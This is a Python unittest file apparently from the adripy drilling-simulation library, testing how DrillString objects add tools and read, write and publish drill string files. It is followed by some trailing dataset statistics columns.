drill_string.add_tool(self.stabilizer)
drill_string.add_tool(self.mwd)
drill_string.add_tool(self.upper_stabilizer)
# Check the number of references to the stabilizer file
num_refs = drill_string.check_for_references(TEST_STABILIZER_FILE)
self.assertEqual(num_refs, 2)
def test_check_references_one_stabs(self):
"""Tests that `DrillString.check_for_references` returns one when checking for references to a stabilizer file in a string that has one reference
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add tools to the drill string
drill_string.add_tool(self.pdc_bit)
drill_string.add_tool(self.motor)
drill_string.add_tool(self.stabilizer)
drill_string.add_tool(self.mwd)
# Check the number of references to the stabilizer file
num_refs = drill_string.check_for_references(TEST_STABILIZER_FILE)
self.assertEqual(num_refs, 1)
def test_add_tool(self):
"""Test the `DrillString.add_tool()` method.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add the DrillTool object to the DrillString object
drill_string.add_tool(self.stabilizer)
# Define the first expected element in DrillString.tools
expected_tool_dictionary = {
'DrillTool': self.stabilizer,
'Type': self.stabilizer.tool_type,
'Name': self.stabilizer.name,
'Property_File': self.stabilizer.property_file,
'Measure': 'no',
'Color': 'Default',
'Number_of_Joints': 1,
'Stack_Order': 1
}
self.assertEqual(drill_string.tools, [expected_tool_dictionary])
def test_write_string_to_database_with_collar(self):
"""Tests if the string file is written correctly when the string has a collar in it.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.collar, measure='yes', joints=TEST_NUMBER_OF_COLLARS, group_name=TEST_COLLAR_GROUPNAME)
drill_string.add_tool(self.drill_pipe, joints=TEST_NUMBER_OF_DRILLPIPES, group_name=TEST_DRILLPIPE_GROUPNAME)
drill_string.add_tool(self.eus, joints=TEST_NUMBER_OF_EUSPIPES, group_name=TEST_EUS_GROUPNAME, equivalent=True)
drill_string.add_tool(self.top_drive)
# Write drill string to file
drill_string.write_to_file(cdb=TEST_DATABASE_NAME)
expected_string_filename = os.path.join(TEST_DATABASE_PATH, 'drill_strings.tbl', TEST_STRING_NAME + '.str')
failures = check_file_contents(expected_string_filename, EXPECTED_STRING_WRITE_TEXT_COLLAR)
self.assertListEqual(failures, [])
def test_write_string_to_database(self):
"""Test the `DrillString.write_to_file()` method.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
# Write drill string to file
drill_string.write_to_file(cdb=TEST_DATABASE_NAME)
expected_string_filename = os.path.join(TEST_DATABASE_PATH, 'drill_strings.tbl', TEST_STRING_NAME + '.str')
failures = check_file_contents(expected_string_filename, EXPECTED_STRING_WRITE_TEXT)
self.assertListEqual(failures, [])
def test_write_string_to_database_with_dfb(self):
"""Test the `DrillString.write_to_file()` method.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add DFBs to the drill string
drill_string.parameters['Distance_from_Bit'] = [100, 200]
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
# Write drill string to file
drill_string.write_to_file(cdb=TEST_DATABASE_NAME)
expected_string_filename = os.path.join(TEST_DATABASE_PATH, 'drill_strings.tbl', TEST_STRING_NAME + '.str')
failures = check_file_contents(expected_string_filename, EXPECTED_STRING_WRITE_TEXT_WITH_DFB)
self.assertListEqual(failures, [])
def test_publish_string_with_spaces_in_hole_path(self):
"""Tests if publish works when the hole path has spaces
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE_WITH_SPACES, TEST_EVENT_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.collar, measure='yes', joints=TEST_NUMBER_OF_COLLARS, group_name=TEST_COLLAR_GROUPNAME)
drill_string.add_tool(self.drill_pipe, joints=TEST_NUMBER_OF_DRILLPIPES, group_name=TEST_DRILLPIPE_GROUPNAME)
drill_string.add_tool(self.eus, joints=TEST_NUMBER_OF_EUSPIPES, group_name=TEST_EUS_GROUPNAME, equivalent=True)
drill_string.add_tool(self.top_drive)
# Write drill string to file
try:
drill_string.write_to_file(cdb=TEST_NEW_DATABASE_NAME, publish=True)
pass
except FileNotFoundError:
self.fail()
def test_publish_string_to_new_database(self):
"""Test the `DrillString.write_to_file()` method with publish=True
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
# Publish drill string to new database
drill_string.write_to_file(cdb=TEST_NEW_DATABASE_NAME, publish=True, publish_event=True)
expected_string_filename = os.path.join(TEST_NEW_DATABASE_PATH, 'drill_strings.tbl', TEST_STRING_NAME + '.str')
expected_text = EXPECTED_STRING_WRITE_TEXT.replace(TEST_DATABASE_NAME, TEST_NEW_DATABASE_NAME)
failures = check_file_contents(expected_string_filename, expected_text)
self.assertListEqual(failures, [])
def test_publish_string_with_duplicate_tools_to_new_database_1(self):
"""Test the `DrillString.write_to_file()` method with publish=True when the string contains two of the same stabilizer. The criteria for this test is that only a single tool file is published to the database even though the tool is used twice.
Notes
-----
This test intentionally uses a string that uses the same tool twice.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.mwd, measure='yes')
drill_string.add_tool(self.upper_stabilizer, measure='yes')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
# Publish drill string to new database
drill_string.write_to_file(cdb=TEST_NEW_DATABASE_NAME, publish=True, publish_event=True)
expected_files = [adripy.get_full_path(drill_string.tools[1]['Property_File'])]
actual_files = glob.glob(os.path.join(TEST_NEW_DATABASE_PATH, 'stabilizers.tbl', '*'))
self.assertListEqual(actual_files, expected_files)
def test_publish_string_with_duplicate_tools_to_new_database_2(self):
"""Test the `DrillString.write_to_file()` method with `publish=True` when the string contains two of the same stabilizer. The criteria for this test is that the `DrillTool` that is used twice has the same property file and it is correct.
Note
----
This test intentionally uses a string that uses the same tool twice.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.mwd, measure='yes')
drill_string.add_tool(self.upper_stabilizer, measure='yes')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
# Publish drill string to new database
drill_string.write_to_file(cdb=TEST_NEW_DATABASE_NAME, publish=True, publish_event=True)
actual_files = [drill_string.tools[i]['Property_File'] for i in [1,3]]
expected_files = [os.path.join(f'<{TEST_NEW_DATABASE_NAME}>', 'stabilizers.tbl', 'example_stabilizer.sta')]*2
self.assertListEqual(actual_files, expected_files)
def test_read_string_from_file_with_spaces_in_hole_ref(self):
    """Tests that the hole reference in a string read from a file is correct
    when that reference contains spaces.
    """
    # cdb-aliased path to the existing string file whose hole reference has spaces
    string_file = os.path.join(
        f'<{TEST_DATABASE_NAME}>',
        'drill_strings.tbl',
        TEST_EXISTING_STRING_NAME_WITH_SPACES_IN_HOLE_REF + '.str',
    )
    string_from_file = adripy.DrillString.read_from_file(string_file)
    # The hole reference must survive the round trip intact
    self.assertEqual(
        string_from_file.parameters['Hole_Property_File'],
        TEST_EXISTING_HOLE_FILE_WITH_SPACES,
    )
def test_read_string_from_file_parameters(self):
    """Tests that the parameters in the string are correct after a string is
    read from a file.
    """
    expected = {
        'Units': 'Imperial',
        'ModelName': 'test_string',
        'OutputName': 'test_string',
        'Gravity': 32.187,
        'Deviation_Deg': 0.0,
        'Adams_Results': 'animation',
        'Adams_Graphics': 'off',
        'Adams_Requests': 'on',
        'Distance_from_Bit': [100.0, 300.0, 500.0],
        'SolverDLL': 'adrill_solver',
        'Hole_Property_File': '<example_database>\\holes.tbl\\test_hole.hol',
        'Contact_Method': 'Subroutine',
        'Cyl_Drag_Coeff': 1.0,
        'Hole_Color': 'LtGray',
        'Event_Property_File': '<example_database>\\events.tbl\\test_event.evt',
    }
    # Read the existing string file (via its cdb alias) into a new object
    string_file = os.path.join(f'<{TEST_DATABASE_NAME}>', 'drill_strings.tbl', TEST_EXISTING_STRING_NAME + '.str')
    string_from_file = adripy.DrillString.read_from_file(string_file)
    # Drop the private distance-from-bit key before comparing
    string_from_file.parameters.pop('_Distance_from_Bit')
    self.assertDictEqual(string_from_file.parameters, expected)
def test_read_string_from_file_measure_off_on_drillpipe(self):
    """Tests that the drill pipe's measure flag is 'no' after a string is
    read from a file.
    """
    string_file = os.path.join(f'<{TEST_DATABASE_NAME}>', 'drill_strings.tbl', TEST_EXISTING_STRING_NAME + '.str')
    drill_string_from_file = adripy.DrillString.read_from_file(string_file)
    drill_pipe = drill_string_from_file.get_tool('drillpipe')
    # Default to None so that, if the drill pipe is somehow absent from the
    # tools list, the assertion below fails with a clear message instead of
    # the loop leaving `measure` unbound and raising NameError.
    measure = None
    # Find the drill pipe's entry in the tools list and record its measure flag
    for tool in drill_string_from_file.tools:
        if tool['DrillTool'] is drill_pipe:
            measure = tool['Measure']
    self.assertEqual(measure, 'no')
def test_read_string_from_file_no_dfb(self):
    """Tests that the parameters are read correctly from a string file that
    has no distance-from-bit entries (`Distance_from_Bit` comes back empty).
    """
    expected = {
        'Units': 'Imperial',
        'ModelName': 'test_string',
        'OutputName': 'test_string',
        'Gravity': 32.187,
        'Deviation_Deg': 0.0,
        'Adams_Results': 'animation',
        'Adams_Graphics': 'off',
        'Adams_Requests': 'on',
        'Distance_from_Bit': [],
        'SolverDLL': 'adrill_solver',
        'Hole_Property_File': '<example_database>\\holes.tbl\\test_hole.hol',
        'Contact_Method': 'Subroutine',
        'Cyl_Drag_Coeff': 1.0,
        'Hole_Color': 'LtGray',
        'Event_Property_File': '<example_database>\\events.tbl\\test_event.evt',
    }
    # Read the no-DFB string file (via its cdb alias) into a new object
    string_file = os.path.join(f'<{TEST_DATABASE_NAME}>', 'drill_strings.tbl', TEST_EXISTING_STRING_NAME_NO_DFB + '.str')
    string_from_file = adripy.DrillString.read_from_file(string_file)
    # Drop the private distance-from-bit key before comparing
    string_from_file.parameters.pop('_Distance_from_Bit')
    self.assertDictEqual(string_from_file.parameters, expected)
def test_read_string_from_file_first_tool(self):
    """Tests that the first tool (the PDC bit) is correct after the string is
    read from a file.
    """
    expected = {
        'Name': 'test_pdc',
        'Type': 'pdc_bit',
        'Property_File': '<example_database>\\pdc_bits.tbl\\test_pdc.pdc',
        'Measure': 'yes',
        'Color': 'Default',
        'Stack_Order': 1,
        'Number_of_Joints': 1,
    }
    # Read the existing string file and pull out its first tool entry
    string_from_file = adripy.DrillString.read_from_file(TEST_EXISTING_STRING_FILE)
    first_tool = string_from_file.tools[0]
    # The DrillTool object itself is not part of the comparison
    first_tool.pop('DrillTool')
    self.assertDictEqual(first_tool, expected)
def test_read_string_from_file_drillpipe(self):
    """Tests that the first few tools are correct after the string is read from a file

    NOTE(review): this method is a byte-for-byte duplicate of
    ``test_read_string_from_file_first_tool`` above -- despite its name it
    checks the first tool (the PDC bit), not the drill pipe.  Confirm which
    tool this test was meant to target and replace the expected values
    accordingly.
    """
    # Expected dict for the FIRST tool (PDC bit) -- presumably this was meant
    # to describe the drill pipe entry instead; verify against the .str fixture.
    expected_tool = {
        'Name': 'test_pdc',
        'Type': 'pdc_bit',
        'Property_File': '<example_database>\\pdc_bits.tbl\\test_pdc.pdc',
        'Measure': 'yes',
        'Color': 'Default',
        'Stack_Order': 1,
        'Number_of_Joints': 1,
    }
    # Read new parameters into the drill string object from a file
    drill_string = adripy.DrillString.read_from_file(TEST_EXISTING_STRING_FILE)
    # Get the first tool
    actual_tool = drill_string.tools[0]
    # Remove the DrillTool key from the dictionary (for testing purposes)
    actual_tool.pop('DrillTool')
    self.assertDictEqual(actual_tool, expected_tool)
def test_read_string_from_file_last_tool(self):
    """Tests that the last tool (the equivalent upper string) is correct after
    the string is read from a file.
    """
    expected = {
        'Name': 'equivalent_pipe',
        'Type': 'equivalent_upper_string',
        'Property_File': '<example_database>\\drill_pipes.tbl\\test_eus.pip',
        'Measure': 'yes',
        'Color': 'Default',
        'Stack_Order': 18,
        'Number_of_Joints': 19,
    }
    # Read the existing string file and pull out its last tool entry
    string_from_file = adripy.DrillString.read_from_file(TEST_EXISTING_STRING_FILE)
    last_tool = string_from_file.tools[-1]
    # The DrillTool object itself is not part of the comparison
    last_tool.pop('DrillTool')
    self.assertDictEqual(last_tool, expected)
def test_read_string_from_file_bit_object(self):
    """Test that bit object attributes are correct after a string is read
    from a file.
    """
    expected_property_file = '<example_database>\\pdc_bits.tbl\\test_pdc.pdc'
    expected_name = 'test_pdc'
    expected_tool_type = 'pdc_bit'
    expected_extension = 'pdc'
    expected_table = 'pdc_bits.tbl'
    # Read new parameters into the drill string object from a file
    drill_string = adripy.DrillString.read_from_file(TEST_EXISTING_STRING_FILE)
    # Get the bit (the first tool)
    bit = drill_string.tools[0]['DrillTool']
    failures = []
    expected_attributes = [expected_property_file, expected_name, expected_tool_type, expected_extension, expected_table]
    # BUGFIX: `bit.table` was missing, so the lists had unequal lengths and
    # `zip` silently dropped the expected_table check.  All five attributes
    # are now compared.
    actual_attributes = [bit.property_file, bit.name, bit.tool_type, bit.extension, bit.table]
    for actual, expected in zip(actual_attributes, expected_attributes):
        if actual != expected:
            failures.append('Attribute Mismatch: {} -- {}'.format(actual, expected))
    self.assertListEqual(failures, [])
def test_read_string_from_file_drillpipe_object(self):
    """Test that drill pipe object attributes are correct after a string is
    read from a file.
    """
    expected_property_file = '<example_database>\\drill_pipes.tbl\\test_eus.pip'
    expected_name = 'test_eus'
    expected_tool_type = 'drillpipe'
    expected_extension = 'pip'
    expected_table = 'drill_pipes.tbl'
    # Read new parameters into the drill string object from a file
    drill_string = adripy.DrillString.read_from_file(TEST_EXISTING_STRING_FILE)
    # Get the equivalent upper string pipe (the last tool)
    pipe = drill_string.tools[-1]['DrillTool']
    failures = []
    expected_attributes = [expected_property_file, expected_name, expected_tool_type, expected_extension, expected_table]
    # BUGFIX: `.table` was missing, so the lists had unequal lengths and
    # `zip` silently dropped the expected_table check.  All five attributes
    # are now compared.
    actual_attributes = [pipe.property_file, pipe.name, pipe.tool_type, pipe.extension, pipe.table]
    for actual, expected in zip(actual_attributes, expected_attributes):
        if actual != expected:
            failures.append('Attribute Mismatch: {} -- {}'.format(actual, expected))
    self.assertListEqual(failures, [])
def test_read_string_from_file_ntools(self):
    """Tests that the number of tools is correct after a string is read from
    a file.
    """
    # The existing string fixture contains 18 tool entries
    string_from_file = adripy.DrillString.read_from_file(TEST_EXISTING_STRING_FILE)
    self.assertEqual(len(string_from_file.tools), 18)
def test_read_string_from_file_collar(self):
    """Tests that a string file is read correctly when it has a collar in it.
    """
    # Read new parameters into the drill string object from a file
    drill_string = adripy.DrillString.read_from_file(TEST_EXISTING_STRING_FILE_COLLAR)
    # Get the collar from the drill string
    collar = drill_string.get_tool('drill_collar')
    # Default to None so that, if the collar is somehow absent from the tools
    # list, the assertion below fails instead of the loop leaving
    # `actual_n_joints` unbound and raising NameError.
    actual_n_joints = None
    # Find the collar in the string's tools list and get its joint count
    for tool in drill_string.tools:
        if tool['DrillTool'] is collar:
            actual_n_joints = tool['Number_of_Joints']
    # Set the expected number of joints
    expected_n_joints = 2
    self.assertEqual(actual_n_joints, expected_n_joints)
def test_read_string_from_file_wrong_case_in_refs(self):
    """Tests that a string file is read correctly when its database
    references use inconsistent letter case.
    """
    # Read the wrong-case string file into a new object
    string_from_file = adripy.DrillString.read_from_file(TEST_EXISTING_STRING_FILE_WRONG_CASE)
    expected = {
        'Units': 'Imperial',
        'ModelName': 'test_string_wrong_case',
        'OutputName': 'test_string_wrong_case',
        'Gravity': 32.187,
        'Deviation_Deg': 0.0,
        'Adams_Results': 'animation',
        'Adams_Graphics': 'off',
        'Adams_Requests': 'on',
        'Distance_from_Bit': [100.0, 300.0, 500.0],
        'SolverDLL': 'adrill_solver',
        'Hole_Property_File': '<ExAmPlE_dAtAbAsE>\\holes.tbl\\test_hole.hol',
        'Contact_Method': 'Subroutine',
        'Cyl_Drag_Coeff': 1.0,
        'Hole_Color': 'LtGray',
        'Event_Property_File': '<ExAmPlE_dAtAbAsE>\\events.tbl\\test_event.evt',
    }
    # Drop the private distance-from-bit key before comparing
    string_from_file.parameters.pop('_Distance_from_Bit')
    self.assertDictEqual(string_from_file.parameters, expected)
def test_read_string_from_file_relative_references(self):
    """Tests that the string is read correctly when the file uses relative
    references.
    """
    # Build a drill string to feed into the DrillSim below
    drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
    drill_string.add_tool(self.pdc_bit, measure='yes')
    drill_string.add_tool(self.stabilizer, measure='yes')
    drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
    drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
    drill_string.add_tool(self.top_drive)
    # Create an event object with simulation steps and ramped inputs
    event = adripy.DrillEvent(TEST_EVENT_NAME, 2000, 3)
    event.add_simulation_step(10)
    event.add_simulation_step(100)
    event.add_ramp('FLOW_RATE', 0, 15, 500)
    event.add_ramp('ROTARY_RPM', 15, 15, 60)
    event.add_ramp('WOB', 30, 15, 50)
    event.add_ramp('ROP', 30, 15, 100)
    # Create a solver settings object
    solver_settings = adripy.DrillSolverSettings(TEST_SOLVER_SETTINGS_NAME)
    # Building the DrillSim writes a string file with relative references
    drill_sim = adripy.DrillSim(drill_string, event, solver_settings, TEST_WORKING_DIRECTORY, TEST_ANALYSIS_NAME)
    try:
        # Only readability matters here; the returned object is unused
        _ = adripy.DrillString.read_from_file(os.path.join(drill_sim.directory, drill_sim.string_filename))
    except FileNotFoundError:
        # The exception is not bound (it was previously bound as `err` but
        # never used); the formatted traceback carries the full detail.
        self.fail('Failed to read the drill string: ' + traceback.format_exc())
def test_get_tool_first(self):
    """Tests that DrillString.get_tool() returns the first matching tool by
    default.
    """
    # Build a string containing two distinct stabilizer objects
    string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
    other_stabilizer = adripy.DrillTool(TEST_STABILIZER_FILE)
    string.add_tool(self.pdc_bit, measure='yes')
    string.add_tool(self.stabilizer, measure='yes')
    string.add_tool(other_stabilizer, measure='no')
    string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
    string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
    string.add_tool(self.top_drive)
    # With no index argument, the first stabilizer added should come back
    self.assertEqual(string.get_tool('stabilizer'), self.stabilizer)
def test_get_tool_last(self):
    """Tests that DrillString.get_tool() returns the last matching tool when
    index=-1.
    """
    # Build a string containing two distinct stabilizer objects
    string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
    other_stabilizer = adripy.DrillTool(TEST_STABILIZER_FILE)
    string.add_tool(self.pdc_bit, measure='yes')
    string.add_tool(self.stabilizer, measure='yes')
    string.add_tool(other_stabilizer, measure='no')
    string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
    string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
    string.add_tool(self.top_drive)
    # index=-1 should return the stabilizer added second
    self.assertEqual(string.get_tool('stabilizer', index=-1), other_stabilizer)
def test_get_tool_1(self):
    """Tests that DrillString.get_tool() returns the first matching tool when
    index=0.
    """
    # Build a string containing two distinct stabilizer objects
    string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
    other_stabilizer = adripy.DrillTool(TEST_STABILIZER_FILE)
    string.add_tool(self.pdc_bit, measure='yes')
    string.add_tool(self.stabilizer, measure='yes')
    string.add_tool(other_stabilizer, measure='no')
    string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
    string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
    string.add_tool(self.top_drive)
    # index=0 should return the stabilizer added first
    self.assertEqual(string.get_tool('stabilizer', index=0), self.stabilizer)
def test_get_tool_2(self):
    """Tests that DrillString.get_tool() returns the second matching tool when
    index=1.
    """
    # Build a string containing two distinct stabilizer objects
    string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
    other_stabilizer = adripy.DrillTool(TEST_STABILIZER_FILE)
    string.add_tool(self.pdc_bit, measure='yes')
    string.add_tool(self.stabilizer, measure='yes')
    string.add_tool(other_stabilizer, measure='no')
    string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
    string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
    string.add_tool(self.top_drive)
    # index=1 should return the stabilizer added second
    self.assertEqual(string.get_tool('stabilizer', index=1), other_stabilizer)
def test_set_pipe_joints_physical(self):
    """Tests that DrillString.set_pipe_joints() correctly sets the number of
    joints on the physical drill pipe.
    """
    n_joints = 100
    # Build a drill string with physical pipe followed by equivalent pipe
    string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
    string.add_tool(self.pdc_bit, measure='yes')
    string.add_tool(self.stabilizer, measure='yes')
    string.add_tool(self.stabilizer, measure='no')
    string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
    string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
    string.add_tool(self.top_drive)
    # Without equivalent=True the physical pipe (second-to-last tool) is changed
    string.set_pipe_joints(n_joints)
    self.assertEqual(string.tools[-2]['Number_of_Joints'], n_joints)
def test_set_pipe_joints_equivalent(self):
    """Tests that DrillString.set_pipe_joints() correctly sets the number of
    joints on the equivalent upper string pipe.
    """
    n_joints = 100
    # Build a drill string with physical pipe followed by equivalent pipe
    string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
    string.add_tool(self.pdc_bit, measure='yes')
    string.add_tool(self.stabilizer, measure='yes')
    string.add_tool(self.stabilizer, measure='no')
    string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
    string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
    string.add_tool(self.top_drive)
    # With equivalent=True the equivalent pipe (last tool) is changed
    string.set_pipe_joints(n_joints, equivalent=True)
    self.assertEqual(string.tools[-1]['Number_of_Joints'], n_joints)
def test_get_bha_length(self):
    """Tests that DrillString.get_bha_length() returns the correct length.
    """
    # Build a drill string whose BHA length is known
    string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
    string.add_tool(self.pdc_bit, measure='yes')
    string.add_tool(self.stabilizer, measure='yes')
    string.add_tool(self.stabilizer, measure='no')
    string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
    string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
    string.add_tool(self.top_drive)
    # BHA length excludes the pipe groups; expected value comes from the fixtures
    self.assertEqual(string.get_bha_length(), 14.48)
def test_get_bha_length_wrong_case(self):
    """Tests that adripy.get_bha_length() returns the correct length for a
    string file whose references use inconsistent letter case.
    """
    # Expected value comes from the wrong-case string fixture
    actual = adripy.get_bha_length(TEST_EXISTING_STRING_FILE_WRONG_CASE)
    self.assertEqual(actual, 502.393)
def test_change_tool_name(self):
    """Tests that renaming a :class:`DrillTool` object updates the 'Name'
    value recorded in :attr:`DrillString.tools` as well.
    """
    new_name = 'new_motor_name'
    # Build a drill string that contains the motor fixture
    string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
    string.add_tool(self.pdc_bit, measure='yes')
    string.add_tool(self.motor, measure='yes')
    string.add_tool(self.stabilizer, measure='yes')
    string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
    string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
    string.add_tool(self.top_drive)
    # Rename the motor through the DrillString's reference to it
    string.get_tool('motor').rename(new_name)
    # Read back the name recorded in the tools list (motor is at index 1)
    recorded_name = string.tools[1]['Name']
    # Clean up the renamed tool file before asserting
    os.remove(os.path.join(TEST_DATABASE_PATH, 'motors.tbl', f'{new_name}.mot'))
    self.assertEqual(recorded_name, new_name)
def test_change_tool_property_file(self):
    """Tests that renaming a :class:`DrillTool` object updates the
    'Property_File' value recorded in :attr:`DrillString.tools` as well.
    """
    new_name = 'new_motor_name'
    expected_propertyfile = os.path.join(f'<{TEST_DATABASE_NAME}>', 'motors.tbl', f'{new_name}.mot')
    # Build a drill string that contains the motor fixture
    string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
    string.add_tool(self.pdc_bit, measure='yes')
    string.add_tool(self.motor, measure='yes')
    string.add_tool(self.stabilizer, measure='yes')
    string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
    string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
    string.add_tool(self.top_drive)
    # Rename the motor through the DrillString's reference to it
    string.get_tool('motor').rename(new_name)
    # Read back the property file recorded in the tools list (motor is at index 1)
    recorded_propertyfile = string.tools[1]['Property_File']
    # Clean up the renamed tool file before asserting
    os.remove(os.path.join(TEST_DATABASE_PATH, 'motors.tbl', f'{new_name}.mot'))
    self.assertEqual(recorded_propertyfile, expected_propertyfile)
def tearDown(self):
    """Remove per-test artifacts: the test config file, any string file
    written by the write tests, and the contents of the new database.
    """
    # Delete test config file.  Tolerate a missing file (e.g. a failed
    # setUp) the same way the string-file removal below does, so tearDown
    # errors don't mask the real test result.
    try:
        os.remove(TEST_CONFIG_FILENAME)
    except FileNotFoundError:
        pass
    # Restore the default ADRILL user configuration
    os.environ['ADRILL_USER_CFG'] = os.path.join(os.environ['USERPROFILE'], '.adrill.cfg')
    # Delete string file from test_write_string_to_database()
    try:
        os.remove(os.path.join(TEST_DATABASE_PATH, 'drill_strings.tbl', TEST_STRING_NAME + '.str'))
    except FileNotFoundError:
        pass
    # Clear the entire new database
    clear_database(TEST_NEW_DATABASE_PATH)
| 45.368944
| 252
| 0.685313
| 4,702
| 36,522
| 5.011484
| 0.063377
| 0.098965
| 0.065354
| 0.084026
| 0.841453
| 0.826897
| 0.811322
| 0.793711
| 0.777627
| 0.757299
| 0
| 0.007198
| 0.227835
| 36,522
| 804
| 253
| 45.425373
| 0.828375
| 0.214337
| 0
| 0.634703
| 0
| 0
| 0.116079
| 0.028358
| 0
| 0
| 0
| 0
| 0.070776
| 1
| 0.079909
| false
| 0.004566
| 0.011416
| 0
| 0.09589
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
65e8f15dff65981b5839d35025c1e9404acdcc2d
| 170
|
py
|
Python
|
kaolin/ops/__init__.py
|
priyasundaresan/kaolin
|
ddae34ba5f09bffc4368c29bc50491c5ece797d4
|
[
"ECL-2.0",
"Apache-2.0"
] | 3,747
|
2019-11-13T02:18:16.000Z
|
2022-03-31T21:12:31.000Z
|
kaolin/ops/__init__.py
|
priyasundaresan/kaolin
|
ddae34ba5f09bffc4368c29bc50491c5ece797d4
|
[
"ECL-2.0",
"Apache-2.0"
] | 371
|
2019-11-13T14:50:59.000Z
|
2022-03-22T19:40:06.000Z
|
kaolin/ops/__init__.py
|
priyasundaresan/kaolin
|
ddae34ba5f09bffc4368c29bc50491c5ece797d4
|
[
"ECL-2.0",
"Apache-2.0"
] | 482
|
